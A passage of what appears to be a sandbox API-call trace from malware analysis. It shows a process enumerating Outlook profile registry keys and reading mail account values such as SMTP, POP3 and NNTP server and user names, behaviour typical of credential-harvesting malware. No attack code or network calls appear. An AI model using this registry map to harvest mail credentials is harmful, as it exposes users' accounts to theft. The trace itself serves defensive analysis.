pszName=0x63baa0, pcchName=0x19fb7c | out: pszName="8503020000000000c000000000000046", pcchName=0x19fb7c) returned 0x0 [0064.839] GetProcessHeap () returned 0x620000 [0064.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b590 [0064.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.840] RegOpenKeyW (in: hKey=0x218, lpSubKey="8503020000000000c000000000000046", phkResult=0x63b590 | out: phkResult=0x63b590*=0x210) returned 0x0 [0064.841] GetProcessHeap () returned 0x620000 [0064.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.841] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.841] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208) returned 0x2 [0064.841] GetProcessHeap () returned 0x620000 [0064.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.842] GetProcessHeap () returned 0x620000 [0064.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63beb8 [0064.842] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.843] wvsprintfW (in: param_1=0x63beb8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046") returned 88 [0064.843] GetProcessHeap () returned 0x620000 [0064.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb4) returned 0x63a478 [0064.843] GetProcessHeap () returned 0x620000 [0064.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.844] GetProcessHeap () returned 0x620000 [0064.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b680 [0064.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.845] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", phkResult=0x63b680 | out: phkResult=0x63b680*=0x204) returned 0x0 [0064.845] GetProcessHeap () returned 0x620000 [0064.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.846] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.846] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x63beb8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0064.846] GetProcessHeap () returned 0x620000 [0064.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.847] RegCloseKey (hKey=0x204) returned 0x0 [0064.847] GetProcessHeap () returned 0x620000 [0064.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b680 | out: hHeap=0x620000) returned 1 [0064.847] GetProcessHeap () returned 0x620000 [0064.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.849] RegCloseKey (hKey=0x210) returned 0x0 [0064.849] GetProcessHeap () returned 0x620000 [0064.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b590 | out: hHeap=0x620000) returned 1 [0064.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.850] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x6, pszName=0x63baa0, pcchName=0x19fb7c | out: pszName="8763203907727d498bce4b981b157d7b", pcchName=0x19fb7c) returned 0x0 [0064.850] GetProcessHeap () returned 0x620000 [0064.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b560 [0064.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.851] RegOpenKeyW (in: hKey=0x218, lpSubKey="8763203907727d498bce4b981b157d7b", phkResult=0x63b560 | out: phkResult=0x63b560*=0x210) returned 0x0 [0064.851] GetProcessHeap () returned 0x620000 [0064.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.852] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208) returned 0x2 [0064.852] GetProcessHeap () returned 0x620000 [0064.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.853] GetProcessHeap () returned 0x620000 [0064.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63beb8 [0064.854] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.854] wvsprintfW (in: param_1=0x63beb8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b") returned 88 [0064.854] GetProcessHeap () returned 0x620000 [0064.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb4) returned 0x63a478 [0064.854] GetProcessHeap () returned 0x620000 [0064.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.855] GetProcessHeap () returned 0x620000 [0064.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b690 [0064.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.860] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b", phkResult=0x63b690 | out: phkResult=0x63b690*=0x204) returned 0x0 [0064.860] GetProcessHeap () returned 0x620000 [0064.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.861] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x63beb8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0064.861] GetProcessHeap () returned 0x620000 [0064.862] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.863] RegCloseKey (hKey=0x204) returned 0x0 [0064.863] GetProcessHeap () returned 0x620000 [0064.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b690 | out: hHeap=0x620000) returned 1 [0064.864] GetProcessHeap () returned 0x620000 [0064.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.865] RegCloseKey (hKey=0x210) returned 0x0 [0064.865] GetProcessHeap () returned 0x620000 [0064.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b560 | out: hHeap=0x620000) returned 1 [0064.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.866] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x7, pszName=0x63baa0, pcchName=0x19fb7c | out: pszName="893893ade607c44aa338ac7df5d6cb42", pcchName=0x19fb7c) returned 0x0 [0064.866] GetProcessHeap () returned 0x620000 [0064.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b6a0 [0064.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.868] RegOpenKeyW (in: hKey=0x218, lpSubKey="893893ade607c44aa338ac7df5d6cb42", phkResult=0x63b6a0 | out: phkResult=0x63b6a0*=0x210) returned 0x0 [0064.868] GetProcessHeap () returned 0x620000 [0064.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.868] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.868] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208) returned 0x2 [0064.868] GetProcessHeap () returned 0x620000 [0064.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.869] GetProcessHeap () returned 0x620000 [0064.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63beb8 [0064.869] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.870] wvsprintfW (in: param_1=0x63beb8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42") returned 88 [0064.870] GetProcessHeap () returned 0x620000 [0064.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb4) returned 0x63a478 [0064.870] GetProcessHeap () returned 0x620000 [0064.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.870] GetProcessHeap () returned 0x620000 [0064.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5c0 [0064.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.871] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42", phkResult=0x63b5c0 | out: phkResult=0x63b5c0*=0x204) returned 0x0 [0064.872] GetProcessHeap () returned 0x620000 [0064.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.873] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x63beb8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0064.873] GetProcessHeap () returned 0x620000 [0064.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.874] RegCloseKey (hKey=0x204) returned 0x0 [0064.874] GetProcessHeap () returned 0x620000 [0064.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5c0 | out: hHeap=0x620000) returned 1 [0064.874] GetProcessHeap () returned 0x620000 [0064.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.876] RegCloseKey (hKey=0x210) returned 0x0 [0064.876] GetProcessHeap () returned 0x620000 [0064.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6a0 | out: hHeap=0x620000) returned 1 [0064.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.877] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x8, pszName=0x63baa0, pcchName=0x19fb7c | out: pszName="9207f3e0a3b11019908b08002b2a56c2", pcchName=0x19fb7c) returned 0x0 [0064.877] GetProcessHeap () returned 0x620000 [0064.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b570 [0064.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.878] RegOpenKeyW (in: hKey=0x218, lpSubKey="9207f3e0a3b11019908b08002b2a56c2", phkResult=0x63b570 | out: phkResult=0x63b570*=0x210) returned 0x0 [0064.878] GetProcessHeap () returned 0x620000 [0064.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.878] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208) returned 0x2 [0064.879] GetProcessHeap () returned 0x620000 [0064.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.879] GetProcessHeap () returned 0x620000 [0064.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63beb8 [0064.880] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.880] wvsprintfW (in: param_1=0x63beb8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2") returned 88 [0064.880] GetProcessHeap () returned 0x620000 [0064.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb4) returned 0x63a478 [0064.880] GetProcessHeap () returned 0x620000 [0064.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.881] GetProcessHeap () returned 0x620000 [0064.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b670 [0064.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.883] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", phkResult=0x63b670 | out: phkResult=0x63b670*=0x204) returned 0x0 [0064.883] GetProcessHeap () returned 0x620000 [0064.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.884] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x63beb8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0064.884] GetProcessHeap () returned 0x620000 [0064.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.886] RegCloseKey (hKey=0x204) returned 0x0 [0064.886] GetProcessHeap () returned 0x620000 [0064.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b670 | out: hHeap=0x620000) returned 1 [0064.886] GetProcessHeap () returned 0x620000 [0064.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.888] RegCloseKey (hKey=0x210) returned 0x0 [0064.888] GetProcessHeap () returned 0x620000 [0064.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b570 | out: hHeap=0x620000) returned 1 [0064.889] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.889] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x9, pszName=0x63baa0, pcchName=0x19fb7c | out: pszName="9375CFF0413111d3B88A00104B2A6676", pcchName=0x19fb7c) returned 0x0 [0064.889] GetProcessHeap () returned 0x620000 [0064.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b680 [0064.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.891] RegOpenKeyW (in: hKey=0x218, lpSubKey="9375CFF0413111d3B88A00104B2A6676", phkResult=0x63b680 | out: phkResult=0x63b680*=0x210) returned 0x0 [0064.891] GetProcessHeap () returned 0x620000 [0064.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.892] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208) returned 0x2 [0064.892] GetProcessHeap () returned 0x620000 [0064.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.892] GetProcessHeap () returned 0x620000 [0064.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63beb8 [0064.893] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.893] wvsprintfW (in: param_1=0x63beb8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 88 [0064.893] GetProcessHeap () returned 0x620000 [0064.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb4) returned 0x63a478 [0064.894] GetProcessHeap () returned 0x620000 [0064.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.894] GetProcessHeap () returned 0x620000 [0064.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b560 [0064.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.896] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", phkResult=0x63b560 | out: phkResult=0x63b560*=0x204) returned 0x0 [0064.896] GetProcessHeap () returned 0x620000 [0064.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.896] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.897] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x63beb8, pcchName=0x19fb4c | out: pszName="00000001", pcchName=0x19fb4c) returned 0x0 [0064.897] GetProcessHeap () returned 0x620000 [0064.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b600 [0064.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.898] RegOpenKeyW (in: hKey=0x204, lpSubKey="00000001", phkResult=0x63b600 | out: phkResult=0x63b600*=0x21c) returned 0x0 [0064.898] GetProcessHeap () returned 0x620000 [0064.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c2d0 [0064.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.899] SHQueryValueExW (in: hkey=0x21c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x63c2d0, pcbData=0x19f6c0*=0x208 | out: pdwType=0x0, pvData=0x63c2d0, pcbData=0x19f6c0*=0x208) returned 0x2 [0064.899] GetProcessHeap () returned 0x620000 [0064.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c2d0 | out: hHeap=0x620000) returned 1 [0064.899] GetProcessHeap () returned 0x620000 [0064.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63c2d0 [0064.900] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.901] wvsprintfW (in: param_1=0x63c2d0, param_2="%s\\%s", arglist=0x19fb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001") returned 97 [0064.901] GetProcessHeap () returned 0x620000 [0064.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc6) returned 0x62dbe0 [0064.901] GetProcessHeap () returned 0x620000 [0064.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c2d0 | out: hHeap=0x620000) returned 1 [0064.901] GetProcessHeap () returned 0x620000 [0064.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5d0 [0064.904] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", phkResult=0x63b5d0 | out: phkResult=0x63b5d0*=0x220) returned 0x0 [0064.904] GetProcessHeap () returned 0x620000 [0064.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c2d0 [0064.905] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x63c2d0, pcchName=0x19fb1c | out: pszName="", pcchName=0x19fb1c) returned 0x103 [0064.905] GetProcessHeap () returned 0x620000 [0064.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c2d0 | out: hHeap=0x620000) returned 1 [0064.906] RegCloseKey (hKey=0x220) returned 0x0 [0064.906] GetProcessHeap () returned 0x620000 [0064.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5d0 | out: hHeap=0x620000) returned 1 [0064.906] GetProcessHeap () returned 0x620000 [0064.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62dbe0 | out: hHeap=0x620000) returned 1 [0064.907] RegCloseKey (hKey=0x21c) returned 0x0 [0064.908] GetProcessHeap () returned 0x620000 [0064.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b600 | out: hHeap=0x620000) returned 1 [0064.908] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x1, pszName=0x63beb8, pcchName=0x19fb4c | out: pszName="00000002", pcchName=0x19fb4c) returned 0x0 [0064.908] GetProcessHeap () returned 0x620000 [0064.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b520 [0064.909] RegOpenKeyW (in: hKey=0x204, lpSubKey="00000002", phkResult=0x63b520 | out: phkResult=0x63b520*=0x21c) returned 0x0 [0064.909] GetProcessHeap () returned 0x620000 [0064.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c2d0 [0064.910] SHQueryValueExW (in: hkey=0x21c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x63c2d0, pcbData=0x19f6c0*=0x208 | out: pdwType=0x0, pvData=0x63c2d0, pcbData=0x19f6c0*=0x1e) returned 0x0 [0064.910] GetProcessHeap () returned 0x620000 [0064.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c6e8 [0064.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.911] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Email Address", pdwReserved=0x0, pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208) returned 0x2 [0064.911] GetProcessHeap () returned 0x620000 [0064.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c6e8 | out: hHeap=0x620000) returned 1 [0064.911] GetProcessHeap () returned 0x620000 [0064.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c6e8 [0064.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.912] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x1c) returned 0x0 [0064.912] GetProcessHeap () returned 0x620000 [0064.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c6e8 | out: hHeap=0x620000) returned 1 [0064.912] GetProcessHeap () returned 0x620000 [0064.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c6e8 [0064.913] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.913] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208) returned 0x2 [0064.913] GetProcessHeap () returned 0x620000 [0064.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c6e8 | out: hHeap=0x620000) returned 1 [0064.914] GetProcessHeap () returned 0x620000 [0064.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c6e8 [0064.914] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.915] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP User", pdwReserved=0x0, pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208) returned 0x2 [0064.915] GetProcessHeap () returned 0x620000 [0064.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c6e8 | out: hHeap=0x620000) returned 1 [0064.915] GetProcessHeap () returned 0x620000 [0064.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c6e8 [0064.916] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.916] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Server", pdwReserved=0x0, pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x1a) returned 0x0 [0064.916] GetProcessHeap () returned 0x620000 [0064.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c6e8 | out: hHeap=0x620000) returned 1 [0064.916] GetProcessHeap () returned 0x620000 [0064.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c6e8 [0064.917] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.917] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208) returned 0x2 [0064.917] GetProcessHeap () returned 0x620000 [0064.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c6e8 | out: hHeap=0x620000) returned 1 [0064.917] GetProcessHeap () returned 0x620000 [0064.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c6e8 [0064.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.919] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 User", pdwReserved=0x0, pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x1e) returned 0x0 [0064.919] GetProcessHeap () returned 0x620000 [0064.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c6e8 | out: hHeap=0x620000) returned 1 [0064.919] GetProcessHeap () returned 0x620000 [0064.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c6e8 [0064.920] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.920] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Email Address", pdwReserved=0x0, pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208) returned 0x2 [0064.920] GetProcessHeap () returned 0x620000 [0064.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c6e8 | out: hHeap=0x620000) returned 1 [0064.920] GetProcessHeap () returned 0x620000 [0064.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c6e8 [0064.921] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.921] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208) returned 0x2 [0064.921] GetProcessHeap () returned 0x620000 [0064.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c6e8 | out: hHeap=0x620000) returned 1 [0064.921] GetProcessHeap () returned 0x620000 [0064.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c6e8 [0064.922] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.922] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Server", pdwReserved=0x0, pdwType=0x0, 